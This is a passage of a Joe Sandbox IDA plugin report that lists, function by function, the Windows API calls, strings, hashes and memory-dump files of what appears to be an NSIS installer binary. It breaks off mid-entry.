                                                Similarity
                                                • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                • String ID: 82D$@%F$@rD$A
                                                • API String ID: 3347642858-1086125096
                                                • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                • CloseHandle.KERNEL32(?), ref: 004071E6
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                • API String ID: 1916479912-1189179171
                                                • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                APIs
                                                • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                • FindClose.KERNEL32(?), ref: 00406E33
                                                Strings
                                                • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                • \*.*, xrefs: 00406D03
                                                • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                • API String ID: 2035342205-3294556389
                                                • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                APIs
                                                • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 3581403547-784952888
                                                • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                APIs
                                                • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                Strings
                                                • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                • API String ID: 542301482-1377821865
                                                • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                • lstrlenW.KERNEL32(?), ref: 004063CC
                                                • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                  • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                • GlobalFree.KERNEL32(?), ref: 004064DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                • API String ID: 20674999-2124804629
                                                • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                • GetSysColor.USER32(?), ref: 004041AF
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                • lstrlenW.KERNEL32(?), ref: 004041D6
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                  • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                • SendMessageW.USER32(00000000), ref: 00404251
                                                • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                • SetCursor.USER32(00000000), ref: 004042D2
                                                • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                • SetCursor.USER32(00000000), ref: 004042F6
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                • String ID: @%F$N$open
                                                • API String ID: 3928313111-3849437375
                                                • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                APIs
                                                • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                • wsprintfA.USER32 ref: 00406B4D
                                                • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                  • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                  • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                • String ID: F$%s=%s$NUL$[Rename]
                                                • API String ID: 565278875-1653569448
                                                • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                • DeleteObject.GDI32(?), ref: 004010F6
                                                • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                • SelectObject.GDI32(00000000,?), ref: 00401149
                                                • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                • DeleteObject.GDI32(?), ref: 0040116E
                                                • EndPaint.USER32(?,?), ref: 00401177
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
